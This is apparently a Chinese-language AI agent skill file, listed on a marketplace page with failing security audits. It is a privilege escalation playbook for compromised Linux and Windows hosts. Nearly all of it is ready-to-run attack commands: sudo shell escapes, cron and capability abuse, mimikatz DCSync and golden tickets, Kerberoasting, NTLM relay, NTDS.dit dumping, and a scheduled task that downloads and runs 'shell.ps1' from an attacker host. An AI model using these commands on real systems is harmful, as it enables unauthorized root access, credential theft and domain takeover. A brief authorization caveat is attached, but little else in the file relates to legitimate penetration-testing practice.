🇨🇳中文介绍

权限提升方法

目的

提供从低权限用户提升到 root/管理员权限的全面技术，适用于已攻陷的 Linux 和 Windows 系统。对于渗透测试的后渗透阶段和红队操作至关重要。

输入/先决条件

• 在目标系统上具有初始低权限 shell 访问权限
• Kali Linux 或渗透测试发行版
• 工具：Mimikatz、PowerView、PowerUpSQL、Responder、Impacket、Rubeus
• 理解 Windows/Linux 权限模型
• 对于 AD 攻击：域用户凭据和对域控制器的网络访问权限

输出/交付成果

• Root 或 Administrator shell 访问权限
• 提取的凭据和哈希值
• 持久化访问机制
• 域沦陷（针对 AD 环境）

---

核心技术

Linux 权限提升

1. 滥用 Sudo 二进制文件

利用 GTFOBins 技术利用配置错误的 sudo 权限：

# 检查 sudo 权限
sudo -l

# 利用常见二进制文件
sudo vim -c ':!/bin/bash'
sudo find /etc/passwd -exec /bin/bash \;
sudo awk 'BEGIN {system("/bin/bash")}'
sudo python -c 'import pty;pty.spawn("/bin/bash")'
sudo perl -e 'exec "/bin/bash";'
sudo less /etc/hosts    # 然后输入：!bash
sudo man man            # 然后输入：!bash
sudo env /bin/bash

2. 滥用计划任务 (Cron)

# 查找可写的 cron 脚本
ls -la /etc/cron*
cat /etc/crontab

# 向可写脚本注入载荷
echo 'chmod +s /bin/bash' > /home/user/systemupdate.sh
chmod +x /home/user/systemupdate.sh

# 等待执行，然后：
/bin/bash -p

3. 滥用能力

# 查找具有能力的二进制文件
getcap -r / 2>/dev/null

# 具有 cap_setuid 能力的 Python
/usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'

# 具有 cap_setuid 能力的 Perl
/usr/bin/perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'

# 具有 cap_dac_read_search 能力的 Tar（可读取任何文件）
/usr/bin/tar -cvf key.tar /root/.ssh/id_rsa
/usr/bin/tar -xvf key.tar

4. NFS Root Squashing

# 检查 NFS 共享
showmount -e <victim_ip>

# 挂载并利用 no_root_squash
mkdir /tmp/mount
mount -o rw,vers=2 <victim_ip>:/tmp /tmp/mount
cd /tmp/mount
cp /bin/bash .
chmod +s bash

5. MySQL 以 Root 身份运行

# 如果 MySQL 以 root 身份运行
mysql -u root -p
\! chmod +s /bin/bash
exit
/bin/bash -p

---

Windows 权限提升

1. 令牌模拟

# 使用 SweetPotato (SeImpersonatePrivilege)
execute-assembly sweetpotato.exe -p beacon.exe

# 使用 SharpImpersonation
SharpImpersonation.exe user:<user> technique:ImpersonateLoggedOnuser

2. 服务滥用

# 使用 PowerUp
. .\PowerUp.ps1
Invoke-ServiceAbuse -Name 'vds' -UserName 'domain\user1'
Invoke-ServiceAbuse -Name 'browser' -UserName 'domain\user1'

3. 滥用 SeBackupPrivilege

import-module .\SeBackupPrivilegeUtils.dll
import-module .\SeBackupPrivilegeCmdLets.dll
Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit C:\temp\ntds.dit

4. 滥用 SeLoadDriverPrivilege

# 加载易受攻击的 Capcom 驱动
.\eoploaddriver.exe System\CurrentControlSet\MyService C:\test\capcom.sys
.\ExploitCapcom.exe

5. 滥用 GPO

.\SharpGPOAbuse.exe --AddComputerTask --Taskname "Update" `
  --Author DOMAIN\<USER> --Command "cmd.exe" `
  --Arguments "/c net user Administrator Password!@# /domain" `
  --GPOName "ADDITIONAL DC CONFIGURATION"

---

Active Directory 攻击

1. Kerberoasting

# 使用 Impacket
GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.100 -request

# 使用 CrackMapExec
crackmapexec ldap 10.0.2.11 -u 'user' -p 'pass' --kdcHost 10.0.2.11 --kerberoast output.txt

2. AS-REP Roasting

.\Rubeus.exe asreproast

3. 黄金票据

# 使用 DCSync 获取 krbtgt 哈希
mimikatz# lsadump::dcsync /user:krbtgt

# 创建黄金票据
mimikatz# kerberos::golden /user:Administrator /domain:domain.local `
  /sid:S-1-5-21-... /rc4:<NTLM_HASH> /id:500

4. 票据传递

.\Rubeus.exe asktgt /user:USER$ /rc4:<NTLM_HASH> /ptt
klist  # 验证票据

5. 使用计划任务的黄金票据

# 1. 提升权限并转储凭据
mimikatz# token::elevate
mimikatz# vault::cred /patch
mimikatz# lsadump::lsa /patch

# 2. 创建黄金票据
mimikatz# kerberos::golden /user:Administrator /rc4:<HASH> `
  /domain:DOMAIN /sid:<SID> /ticket:ticket.kirbi

# 3. 创建计划任务
schtasks /create /S DOMAIN /SC Weekly /RU "NT Authority\SYSTEM" `
  /TN "enterprise" /TR "powershell.exe -c 'iex (iwr http://attacker/shell.ps1)'"
schtasks /run /s DOMAIN /TN "enterprise"

---

凭据收集

LLMNR 投毒

# 启动 Responder
responder -I eth1 -v

# 创建恶意快捷方式 (Book.url)
[InternetShortcut]
URL=https://facebook.com
IconIndex=0
IconFile=\\attacker_ip\not_found.ico

NTLM 中继

responder -I eth1 -v
ntlmrelayx.py -tf targets.txt -smb2support

使用 VSS 转储

vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\

---

快速参考

---

约束

必须：

• 在尝试提升权限前拥有初始 shell 访问权限
• 在选择技术前验证目标操作系统和环境
• 针对域提升与本地提升使用适当的工具

禁止：

• 未经授权在生产系统上尝试技术
• 未经客户批准留下持久化机制
• 忽略检测机制（EDR、SIEM）

应该：

• 在利用前进行彻底枚举
• 记录所有成功的提升路径
• 在任务结束后清理痕迹

---

示例

示例 1：Linux Sudo 到 Root

# 检查 sudo 权限
$ sudo -l
User www-data may run the following commands:
    (root) NOPASSWD: /usr/bin/vim

# 利用 vim
$ sudo vim -c ':!/bin/bash'
root@target:~# id
uid=0(root) gid=0(root) groups=0(root)

示例 2：Windows Kerberoasting

# 请求服务票据
$ GetUserSPNs.py domain.local/jsmith:Password123 -dc-ip 10.10.10.1 -request

# 使用 hashcat 破解
$ hashcat -m 13100 hashes.txt rockyou.txt

---

故障排除

---

其他资源

如需详细的枚举脚本，请使用：

• LinPEAS : Linux 权限提升枚举
• WinPEAS : Windows 权限提升枚举
• BloodHound : Active Directory 攻击路径映射
• GTFOBins : Unix 二进制文件利用参考

每周安装数

0

仓库

automindtechnol…skill.md

首次出现

Jan 1, 1970

安全审计

Gen Agent Trust HubWarnSocketFailSnykFail

# Check sudo permissions
sudo -l

# Exploit common binaries
sudo vim -c ':!/bin/bash'
sudo find /etc/passwd -exec /bin/bash \;
sudo awk 'BEGIN {system("/bin/bash")}'
sudo python -c 'import pty;pty.spawn("/bin/bash")'
sudo perl -e 'exec "/bin/bash";'
sudo less /etc/hosts    # then type: !bash
sudo man man            # then type: !bash
sudo env /bin/bash